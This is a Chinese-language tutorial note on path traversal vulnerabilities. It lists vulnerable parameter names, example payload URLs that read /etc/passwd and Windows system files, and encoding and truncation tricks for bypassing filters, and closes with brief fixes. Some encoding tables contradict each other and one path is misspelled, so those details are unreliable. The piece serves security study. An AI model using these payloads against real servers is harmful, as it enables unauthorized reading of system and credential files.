路径穿越（Path Traversal）详解

前言

本文主要是对路径穿越漏洞进行学习总结，本身这个漏洞也并不常见，主要是多产生于php的程序。

这种类型的攻击强制访问文件、目录、 以及位于 Web 文档根目录之外的命令 或 CGI 根目录。

常用来其他读取、写入类漏洞结合。

路径穿越漏洞的分类

我个人给这种漏洞形成的原因可以分为两类
错误配置

由于带有中间代理转发性质的功能配置错误

程序本身代码存在问题

这一点十分好理解，就是代码写的有问题，逻辑简单，没有验证。

漏洞容易出现的位置

第一类：文件类参数

请求参数似乎包含文件或目录名称的，例如include=main.inc或template=/en/sidebar。

第二种：常见参数

cat,dir,action,board,date,detail,file,download,path,folder,prefix

include,page,inc,locate,show,doc,site,type,view,content,document

layout,mod,conf

第三种：域名根部

根据推测这种应该是由于配置问题导致的。

www.test.com/../../../../../../../../../../../etyc/passwd

攻击技巧

通过…/ 到上一层目录

这个是最基本，最常用的。

绝对路径遍历

以下 URL 可能容易受到此攻击：

https://testsite/get.php?f=list 
https://testsite/get.cgi?f=5 
https://testsite/get.asp?f=test

攻击者可以像这样执行此攻击：

https://testsite/get.php?f=/var/www/html/get.php 
https://testsite/get.cgi?f=/var/www/html/admin/get.inc 
https:// testsite/get.asp?f=/etc/passwd

当网络服务器返回有关网络应用程序错误的信息时，攻击者更容易猜测正确的位置（例如，带有源代码的文件的路径，然后可能会显示）。

相对路径遍历

相对路径遍历见的较多

http://example.com/index.php?page=../../../etc/passwd

利用技巧

权限探测

如果可以读取以下文件，那么至少的管理员组的用户，当然前提是有administrator这个用户，没有的话，就要猜测用户了。

    c:/documents and settings/administrator/ntuser.ini
    c:/documents and settings/administrator/desktop/desktop.ini
    c:/users/administrator/desktop/desktop.ini
    c:/users/administrator/ntuser.ini

如果可以读取以下文件，则读取文件的进程拥有LocalSystem权限；

    c:/system volume information/wpsettings.dat
    C:/Windows/CSC/v2.0.6/pq
    C:/Windows/CSC/v2.0.6/sm
    C:/$Recycle.Bin/S-1-5-18/desktop.ini

关于LocalSystem:LocalSystem是预设的拥有本机所有权限的本地账户，这个账户跟通常的用户账户没有任何关联，也没有用户名和密码之类的凭证。这个服务账户可以打开注册表的HKEY_LOCAL_MACHINE\Security键，当LocalSystem访问网络资源时，它是作为计算机的域账户使用的。

绕过

16 位 Unicode 编码

. = %u002e
/ = %u2215
\ = %u2216

UTF-8编码

. = %c0%2e, %e0%40%ae, %c0ae
/ = %c0%af, %e0%80%af, %c0%2f
\ = %c0%5c, %c0%80%5c

UTF-7编码

UTF-7（7 位 Unicode 转换格式）是一种可变长度字符编码，

超长的 UTF-8 统一码编码

.： %c0%2e， %e0%40%ae， %c0ae
\： %c0%af， %e0%80%af， %c0%2f
/： %c0%5c， %c0%80%5c

双层url编码

. = %252e
/ = %252f
\ = %255c

非常规组合
“.”、“/”、“”,三个符号随意的组合多次（随机0-3次比较好感觉，因为看到的很多例子大概就是这样），进行绕过，如必要还可以添加其他符号进行尝试。下面是示例。也就是有点进行FUzz的意思

....//....//etc/passwd
..///....//etc/passwd
/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
..././
...\.\
..;/

%00截断

有些程序会在读取内容是添加指定后缀，使用%00可以进行截断，忽视后面的内容

http://example.com/index.php?page=../../../etc/passwd%00

PHP 修复了该问题 在版本 5.3.4 中。

"?"截断

跟上诉情况相同，在最后添加？也许同样会有效果

修复

1. 限制目录访问
2. 检查用户输入

参考

https://code.google.com/archive/p/teenage-mutant-ninja-turtles/wikis/AdvancedObfuscationPathtraversal.wiki